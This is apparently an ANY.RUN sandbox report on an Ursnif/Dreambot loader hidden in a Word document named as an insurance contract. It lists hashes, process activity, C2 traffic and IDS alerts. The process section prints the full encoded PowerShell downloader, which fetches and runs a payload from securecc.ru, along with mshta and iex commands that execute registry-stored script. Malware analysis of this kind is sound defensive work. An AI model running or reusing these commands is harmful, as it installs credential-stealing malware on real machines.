analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Застрахователен договор н_00114.doc

Full analysis: https://app.any.run/tasks/ca30af44-3a08-4d46-8ab3-ba14cba67914
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 17, 2020, 18:10:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
generated-doc
loader
trojan
gozi
ursnif
dreambot
evasion
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 01:45:00 2020, Last Saved Time/Date: Fri Jan 17 01:45:00 2020, Number of Pages: 1, Number of Words: 85, Number of Characters: 487, Security: 0
MD5:

ED311EA2FFEC4B4FC970BC64D51FB86D

SHA1:

A97AE0632508F3648BC7953F32D7B0341126D34A

SHA256:

9CE3F98C3009F49B191E59642865B7FCC04819356A6801477075570123DA9E87

SSDEEP:

3072:aM+qyNNxyhQSZ1grOnc1sn8LRMESn9oObd1:aJ9NNeQSZ1grOnc1sn8dB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 4048)

    • URSNIF was detected

      • iexplore.exe (PID: 3532)
      • iexplore.exe (PID: 1324)

    • Connects to CnC server

      • iexplore.exe (PID: 3532)
      • iexplore.exe (PID: 1324)
      • explorer.exe (PID: 352)

    • Executes PowerShell scripts

      • mshta.exe (PID: 3824)
      • cmd.exe (PID: 3140)

    • Application was injected by another process

      • explorer.exe (PID: 352)

    • Starts Visual C# compiler

      • powershell.exe (PID: 3792)
      • powershell.exe (PID: 912)

    • Runs injected code in another process

      • powershell.exe (PID: 3792)

    • URSNIF Shellcode was detected

      • explorer.exe (PID: 352)

    • Actions looks like stealing of personal data

      • explorer.exe (PID: 352)

  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 4048)

    • Creates files in the user directory

      • powershell.exe (PID: 4048)
      • powershell.exe (PID: 3792)
      • explorer.exe (PID: 352)
      • powershell.exe (PID: 912)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4048)

    • Executed via COM

      • iexplore.exe (PID: 720)

    • Uses RUNDLL32.EXE to load library

      • powershell.exe (PID: 4048)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • explorer.exe (PID: 352)

    • Reads Internet Cache Settings

      • explorer.exe (PID: 352)

    • Checks for external IP

      • nslookup.exe (PID: 2152)

    • Starts CMD.EXE for commands execution

      • explorer.exe (PID: 352)

    • Loads DLL from Mozilla Firefox

      • explorer.exe (PID: 352)

    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 4016)

    • Uses TASKLIST.EXE to query information about running processes

      • cmd.exe (PID: 2408)

    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 1972)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 896)

    • Searches for installed software

      • reg.exe (PID: 3356)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1296)
      • iexplore.exe (PID: 3532)
      • iexplore.exe (PID: 720)

    • Starts Microsoft Office Application

      • explorer.exe (PID: 352)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1296)

    • Manual execution by user

      • powershell.exe (PID: 4048)
      • mshta.exe (PID: 3824)

    • Application launched itself

      • iexplore.exe (PID: 720)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3532)
      • iexplore.exe (PID: 1324)

    • Changes internet zones settings

      • iexplore.exe (PID: 720)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3532)
      • mshta.exe (PID: 3824)
      • iexplore.exe (PID: 1324)

    • Reads settings of System Certificates

      • explorer.exe (PID: 352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 571
Paragraphs: 1
Lines: 4
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 487
Words: 85
Pages: 1
ModifyDate: 2020:01:17 01:45:00
CreateDate: 2020:01:17 01:45:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
98
Monitored processes
41
Malicious processes
8
Suspicious processes
2

Behavior graph

Click at the process to see the details
start inject winword.exe no specs powershell.exe rundll32.exe no specs iexplore.exe #URSNIF iexplore.exe #URSNIF iexplore.exe mshta.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs #URSNIF explorer.exe cmd.exe no specs nslookup.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs systeminfo.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs cmd.exe no specs net.exe no specs cmd.exe no specs cmd.exe no specs nslookup.exe cmd.exe no specs cmd.exe no specs tasklist.exe no specs cmd.exe no specs cmd.exe no specs driverquery.exe no specs cmd.exe no specs cmd.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1296"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Застрахователен договор н_00114.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4048"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwB0AHAAZQB1AHkAdQBnAHYAdABoAHgAYgB1AHEAaAAKACQAawBnAHYAZwBuACAAPQAgACIAagBsAGwAdwBxAHAAaQBoAHcAegB1AG4AcgAiADsACgAkAHEAbABiAG8AawBlAGkAbwBxAGMAdgBvAGEAegBnAD0AIgBqAGMAaABqAHoAdQB2ACIAOwAKACQAeABoAGQAdABsAHkAdgBqAGIAbAB6AGUAcABuAGwAaABkAGUAaABwAHYAZQByAD0AOAAxADsARgBvAHIAIAAoACQAcAB6AGgAdgBjAGkAdABjAD0AMAA7ACAAJABwAHoAaAB2AGMAaQB0AGMAIAAtAGwAZQAgADUANAA7ACAAJABwAHoAaAB2AGMAaQB0AGMAKwArACkAIAB7ACQAeABoAGQAdABsAHkAdgBqAGIAbAB6AGUAcABuAGwAaABkAGUAaABwAHYAZQByAD0AIAAoADkAMwAgACoAIAAkAHAAegBoAHYAYwBpAHQAYwApAH0ACgAkAGMAaAB3AGsAdQBiAGkAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAGsAZwB2AGcAbgArACIALgBiAGkAbgAiADsACgAkAGoAZwBkAHYAaABmAHEAcAB0AGYAdgBmAD0AIgB6AHkAbQBkAHgAdwBxAG0AagBzACIAOwAKACQAaQBzAHMAdgBhAHEAaQA9ACIAaAB0AHQAcAA6AC8ALwBzAGUAYwB1AHIAZQBjAGMALgByAHUALwBrAGYAbwBpAHUAeQByAHQAZQBiAG4AdgBoAGMAZwB4AGwAagBrAGoAaAAuAGIAaQBuACIAOwAKACQAbgB5AGcAaABzAG0AeAB2AGIAaQBlAD0AIgBwAHcAbAB1AHkAbgBhAHkAbwBuACIAOwAKACQAdgBwAHUAbwBtACAAPQAgACQAYQBlAHUAZwB3AGwAOwAKACQAbgBtAGkAYwBwAHAAPQAiAGEAagBxAGYAaQAiADsACgAkAHQAYQBwAHYAdgA9ADMAMwA7AEYAbwByACAAKAAkAHIAdwBxAGcAcwB2AG4AbABrAD0AMAA7ACAAJAByAHcAcQBnAHMAdgBuAGwAawAgAC0AbABlACAANgAzADsAIAAkAHIAdwBxAGcAcwB2AG4AbABrACsAKwApACAAewAkAHQAYQBwAHYAdgA9ACAAKAA1ADcAIAAqACAAJAByAHcAcQBnAHMAdgBuAGwAawApAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZgBiAHUAagB4AGgAPQAiAHoAdQBrAGMAawBmAGsAYwB6ACIAOwAKAFcAaABpAGwAZQAgACgAJAB2AHAAdQBvAG0AIAAtAGUAcQAgACQAYQBlAHUAZwB3AGwAKQAgAHsACgAkAHIAYwBwAHYAYQBhAGkAZQBrAHUAPQAiAGoAdAByAGkAYgBrAG4AbQBmAGcAcgBkACIAOwAKAHQAcgB5AHsACgAkAHoAcABsAHYAegB2AHEAdwBnAHkAZwB4AGwAYwA9ACIAYQBjAGEAeQBtAG0AagBkAHQAeAAiADsACgAkAGkAZQBzAG0AZABqAGkAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAdABoAGcAaQB3AG4AbwB5AGoAegBhAD0AIgB5AGIAcAB0AGkAeABoAGUAdwBjACIAOwAKACQAaQBlAHMAbQBkAGoAaQAuACIARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIgAoACQAaQBzAHMAdgBhAHEAaQAsACAAJABjAGgAdwBrAHUAYgBpACkAOwAKACQAeABxAGEAbABvAHYAcQA9ACIAcgB3AHEAcwBwAGMAawB6AHgAYgBhAGUAYgB0AHcAcQB2ACIAOwAKAEkAZgAgACgAKAAuACgAIgBHAGUAdAAtAEkAdABlAG0AIgApACAAJABjAGgAdwBrAHUAYgBpACkALgAiAGwAZQBuAGcAdABoACIAIAAtAGcAZQAgADEAMAAwADEAMwAyACkAIAB7AAoAJABiAGsAbQBlAGEAbQBhAGMAagB0AG4AbgBqAGQAdwA9ACIAeQB0AG0AeAB3AGkAZQBkAGIAYwBvAHUAZQBmAGgAIgA7AAoAJAB2AHAAdQBvAG0AIAA9ACAAJAB4AGgAdAB5AGgAbQA7AAoAJABoAHMAZgBxAHMAegBrAHIAdgBlAHoAdgBtAGIAPQAiAGMAZQBpAHEAYwBkAHAAeQBlACIAOwAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgAgAC0AQQByAGcAcwAgACIAJABjAGgAdwBrAHUAYgBpACwAIABEAGwAbABSAGUAZwBpAHMAdABlAHIAUwBlAHIAdgBlAHIAIgA7AAoAJABrAGwAeQBrAGcAaQBlAHEAagBhAD0AIgBuAGwAYQBkAG8AIgA7AAoAZABlAGwAZgA7AAoAJABqAHMAZQB2AHYAcgB1AHUAaQB4AHMAZQBwAHEAcwA9ACIAbABiAGsAdgBhAGkAdQBvAGoAdwB5AG8AdgBxACIAOwAKAGUAeABpAHQAOwAKACQAYgByAGUAagBiAG8AbABnAGgAcAB2AD0AIgB3AHEAegBiAHIAYQBiAGQAcQB4AGYAdQB5AGEAbgAiADsACgB9AAoAJABiAG8AZQB4AGQAYwBkAHoAcAB2AGIAdQB6AGYAPQAiAHkAdABnAHkAZAB0AGUAdQBxAHcAagB1AHkAcwB4AG8AeQBsACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAHoAZwBuAGIAeQBnAGsAcABjAHMAbgB3AGUAPQAiAHUAbwB3AG0AZgBzAGQAegB6AHMAaABnAGUAZQAiADsACgB9AAoAJABkAHkAcwBtAGQAZABtAHEAYwBoAHQAcgByAHcAPQAiAHcAdgB1AHEAZABqAGcAbwBsAGwAdQBtAGQAawB2AGMAbQAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAA1ADsACgAkAGgAbwBqAGgAbQBoAHYAZABjAGUAbAB2AD0AIgBtAGgAZQBwAHYAIgA7AAoAfQB9ACQAcAB2AHQAZQBjAHIAcQBnAHUAcABiAGIAcgBvAHIAaQBmAGkAdwBlAD0ANAAwADsARgBvAHIAIAAoACQAbwB5AHkAcwBqAHMAaQA9ADAAOwAgACQAbwB5AHkAcwBqAHMAaQAgAC0AbABlACAAOQA3ADsAIAAkAG8AeQB5AHMAagBzAGkAKwArACkAIAB7ACQAcAB2AHQAZQBjAHIAcQBnAHUAcABiAGIAcgBvAHIAaQBmAGkAdwBlAD0AIAAoADgAIAAqACAAJABvAHkAeQBzAGoAcwBpACkAfQAKAEYAdQBuAGMAdABpAG8AbgAgAGQAZQBsAGYAewAKACQAcABzAGQAcwB0AHQAdABzAD0AIgBxAG8AZABiAHUAZwBqAGYAbwByAGQAcgBxAHYAcQAiADsACgB0AHIAeQB7AAoAJAB2AGwAdQB0AGEAZgBpAGoAZQA9ACIAagB3AGMAcAB1AG8AcQByAGQAZgBkAGMAcABkAGkAIgA7AAoAcwBsAGUAZQBwACAALQBzACAAMQAwADsACgAkAGYAZwBtAHIAYQA9ACIAeQBwAHUAYQBtAHUAYQBxAGYAZwB0ACIAOwAKAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0AUABhAHQAaAAgACQAYwBoAHcAawB1AGIAaQA7AAoAJAByAGoAbgB0AGIAYwBrAD0AIgBjAGgAZAB2AGcAegByACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAHMAagBvAHYAbwBvAHEAawBkAHYAcgA9ACIAaQB1AGoAdQB0AHEAcwBqAHkAcAB2AGkAagBrAHoAbwBmAGMAIgA7AAoAZABlAGwAZgA7AAoAJABiAG8AdAB2AGMAPQAiAGcAZgB4AGIAaQBlACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAeQBtAGsAeABvAHkAZgB6AHYAPQAiAG4AcgB5AGMAagBnAHoAYQBkAG8AdQAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3100"C:\Windows\system32\rundll32.exe" C:\Users\admin\jllwqpihwzunr.bin, DllRegisterServer C:\Windows\system32\rundll32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
720"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3532"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:720 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1324"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:720 CREDAT:203009C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3824"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\89726C36-545A-A301-A6CD-C8873A517CAB\\Devivmgr'));if(!window.flag)close()</script>"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3792"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\89726C36-545A-A301-A6CD-C8873A517CAB").crypptsp))C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2240"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\hn0u9ccj.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
2768C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES78E0.tmp" "c:\Users\admin\AppData\Local\Temp\CSC78DF.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
Total events
7 524
Read events
6 412
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
11
Text files
33
Unknown types
15

Dropped files

PID
Process
Filename
Type
1296WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA514.tmp.cvr
MD5:
SHA256:
1296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D14C5934.wmf
MD5:
SHA256:
1296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C27F3FA5.wmf
MD5:
SHA256:
1296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CAEEF962.wmf
MD5:
SHA256:
1296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E011B5FB.wmf
MD5:
SHA256:
1296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34EB3FC0.wmf
MD5:
SHA256:
1296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A518BCC1.wmf
MD5:
SHA256:
1296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC4F7BCE.wmf
MD5:
SHA256:
1296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\827B5D77.wmf
MD5:
SHA256:
1296WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E820290C.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
20
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3532
iexplore.exe
GET
151.251.24.148:80
http://ccsecure.ru/images/UQ7UQqrAF8pYxoB/FUy_2FUywdvf_2B6ph/QsasUyML2/a6Q0RosNa2ld8MtPSoei/u_2BUtaVA6FKhhMAKKO/LkGwJGWF5iELN7cjrjdIeq/2o_2FhfH0uDTc/NHcVmxct/vDiQqjz8_2FU1CKJY_2Fs7B/LMaA_2FlJ/ytA1dauV.avi
BG
malicious
352
explorer.exe
GET
37.34.225.14:80
http://buddy-calc.at/images/RWV1IM07e1/zeoQCrhxU_2Bx_2Bo/KnvtBDmBezaA/sNKsI27t5TV/3RAKbIZZCqkkN9/zIbxQVenbXwxWKrx9R45p/2BcD4rfpCBC_2FZd/345_2FW1QQ8sjkh/lx1jD0LB05WdoqHtsM/WMYTSEF8n/1dkUSgwoADekQsWWKUH5/bOpebuK_2FfmCysl79N/tw1Wuj7rsJAmdtzJcX/fl.jpeg
KW
malicious
1324
iexplore.exe
GET
151.251.24.148:80
http://ccsecure.ru/images/YTnB4UMLZyLkVKroJN/73X7BKEki/NFb5IF9uYjHQCH1WqRED/o1RcLrXnHbffrN00B_2/FxrvNhweZ827HVHId8hzUn/stLVHv6492_2B/S6w2GlSm/398FvrTPMbrKzF_2B5G5qAF/eiZ0fMknvP/vDv0q2OAtyHlwqqAZ/eSXP25zbN05lxF/b1md.avi
BG
malicious
352
explorer.exe
GET
190.140.198.49:80
http://securecc.ru/jupd32.bin
PA
malicious
352
explorer.exe
GET
200
37.34.225.14:80
http://buddy-calc.at/images/BPK1z7Z91BhOzZtDJBYvY/QJqfh1awt_2BLVyE/RvMqOHoyuk4Z1o0/VJ6mTp3NhJuWPNirme/uGpofWpZi/VrQaHoZvtJSOkilpVaoL/SuDs3V9WGnilD_2BM2w/RYzoY_2FCgPL8yMT9pWb3w/uCODGnCz7zozl/gSwtob49/Aju_2B3il8Kn_2BLF6B/7.gif
KW
binary
926 b
malicious
720
iexplore.exe
GET
404
151.251.24.148:80
http://ccsecure.ru/favicon.ico
BG
html
564 b
malicious
352
explorer.exe
POST
37.34.225.14:80
http://buddy-calc.at/images/SB2Jteg_/2FqnIhFNpM6_2Bj5uMVPB2G/N4tK7wYxTK/aWsKGl6l1HJz53OkX/Fz4_2B8afM2r/EF_2BFpSU2B/vuwSy9OH8oCj_2/FFubTax3vG9fGUvj7Onsa/SyiYH_2FbEbWPEYP/ghe5l9J2Yl9dIsb/cYceHzHr3eWahLS_2B/Oe8cKy7im/Q3b11wCPMK7NB55zfwAs/_2BtV7eEzbjgOWJTOrV/1vf1Qd57Xj0/_2Ba4YUK.bmp
KW
malicious
4048
powershell.exe
GET
200
190.140.198.49:80
http://securecc.ru/kfoiuyrtebnvhcgxljkjh.bin
PA
executable
248 Kb
malicious
352
explorer.exe
GET
37.34.225.14:80
http://buddy-calc.at/images/LyGAnzQ5hVbd_2B1EqWywrYgBs/Fvwoe2p/lQ0O91yI9v510EwKf/RyIA7LOZMxGqHksx0ePn_2B2dQLa5Kdxzyj/RiYpA.ttf
KW
malicious
352
explorer.exe
GET
200
37.34.225.14:80
http://buddy-calc.at/images/LyG/AnzQ5hVbd_2B1EqWyw/rYgBsFvwoe2plQ0O91yI9v53dFzkfQU2p/wh4vBhVb984xc7ADnaIzVathCzu54Nf67yuOhyp9NOKrNbta0o2rhtI.ttf
KW
binary
324 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
720
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3532
iexplore.exe
151.251.24.148:80
securecc.ru
Blizoo Media and Broadband
BG
malicious
4048
powershell.exe
190.140.198.49:80
securecc.ru
Cable Onda
PA
malicious
352
explorer.exe
172.217.22.14:443
google.com
Google Inc.
US
whitelisted
720
iexplore.exe
151.251.24.148:80
securecc.ru
Blizoo Media and Broadband
BG
malicious
1324
iexplore.exe
151.251.24.148:80
securecc.ru
Blizoo Media and Broadband
BG
malicious
352
explorer.exe
172.217.18.4:443
www.google.com
Google Inc.
US
whitelisted
2152
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
352
explorer.exe
190.140.198.49:80
securecc.ru
Cable Onda
PA
malicious

DNS requests

Domain
IP
Reputation
securecc.ru
  • 190.140.198.49
  • 186.87.135.97
  • 203.91.116.53
  • 181.59.254.21
  • 31.5.167.149
  • 201.189.190.227
  • 181.168.208.178
  • 95.219.150.97
  • 151.251.24.148
  • 213.222.130.75
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
ccsecure.ru
  • 151.251.24.148
  • 213.222.130.75
  • 190.140.198.49
  • 186.87.135.97
  • 203.91.116.53
  • 181.59.254.21
  • 31.5.167.149
  • 201.189.190.227
  • 181.168.208.178
  • 95.219.150.97
malicious
google.com
  • 172.217.22.14
whitelisted
www.google.com
  • 172.217.18.4
whitelisted
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
shared
curlmyip.net
  • 104.31.65.34
  • 104.31.64.34
shared
buddy-calc.at
  • 37.34.225.14
  • 37.75.49.82
  • 109.121.214.139
  • 86.105.60.33
  • 79.124.89.241
  • 92.87.103.90
  • 89.47.94.113
  • 91.83.70.44
  • 213.222.130.75
  • 79.136.8.168
malicious

Threats

PID
Process
Class
Message
4048
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4048
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3532
iexplore.exe
A Network Trojan was detected
AV TROJAN Ursnif Variant CnC Beacon 2019-09-18
3532
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
1324
iexplore.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2152
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2152
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2152
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2152
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup)
9 ETPRO signatures available at the full report
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Застрахователен договор н_00114.doc